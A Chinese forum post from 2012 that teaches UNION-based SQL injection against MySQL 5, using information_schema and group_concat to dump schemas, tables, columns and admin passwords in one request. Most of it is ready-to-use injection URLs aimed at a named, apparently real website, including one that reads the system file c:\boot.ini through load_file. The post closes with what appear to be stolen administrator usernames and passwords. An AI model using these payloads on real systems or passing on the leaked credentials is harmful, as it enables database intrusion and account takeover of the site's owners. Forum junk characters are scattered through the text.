此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似# }4 K0 T6 _* V
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
K* f6 F$ d% l* p% g) I8 J
, h! [) a9 i( l4 ~4 T+ S+ l2 A) H4 B
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
2 O C1 Q M' s M; z" f3 V; L* q8 q# b8 M! H% P, p% X1 E$ i3 _
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
5 v: l. A, O& ]1 M, o% r
. p- B. i+ g+ Q% q下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示' W# V4 E- U3 N# @
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
" v0 q8 s7 k/ m, r( @- U7 z; ^4 z& e) d/ g, l0 h5 x
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17. t# \5 O, p( y4 H" V' J
3 F5 q3 W4 J9 t9 j! ~
读出所有库:
4 J- w$ m2 K7 C5 }http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA. l1 R6 w2 N( T) f) U6 Z
9 s( W' T0 z! k, M( h" \4 {
) B# w8 t2 f8 L+ L6 I3 | ~5 e- Q+ W% e# k
读出所有表:
2 i8 C/ r y& q1 \6 d v Ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()1 \+ P. |' b. L6 x0 x
% w+ {5 o2 e1 q1 p5 l( T8 U8 y: M
读出所有表字段:
- {. ?2 ^. z2 } x" ]http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)0 b8 d& B# D2 t. B
*/ (97,100,109,105,110)为admin的ascii码 依次类推5 J, Q/ f1 n- x5 E: k1 Y
! m4 `/ j% U( ]; t5 w- ]% s
读出所有表字段里的内容:3 Q' {; x7 D5 u% b
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin/ n# u1 S+ s. D5 W* V* N7 ^
& S6 A% @, d6 K
% n; r, M! N/ l0 d$ R* t9 n6 ^' r- |0 Y0 y- P
5 A' N- U0 J6 F7 _) w
' m1 b7 [- X) r$ P- T
0 [; n( i/ L! N6 M, l, ]http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
, p" O" d( z" t9 H y/ L( [. y$ R( E# M1 U' r
7 f7 `' B, x0 L: q' {
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
7 c- ~$ x. }7 S+ y
/ h; _" X3 W& P8 ?; Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23+ b' F9 R' Y" o) W: L
0 n1 j; c' W+ Y6 d( p! x8 X- d/ D- m- a/ L0 @
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
7 f4 C8 Z, Y( i) h( E% m
9 U# `2 Y, S. _
3 v3 ?; n1 k6 x! R/ R, t% J* ^. K webmaster:dzb521123,simlab:simadmin20043233
, I% o5 ]5 f9 y7 \ |
发表于 2012-9-13 16:37:34
收藏
支持
反对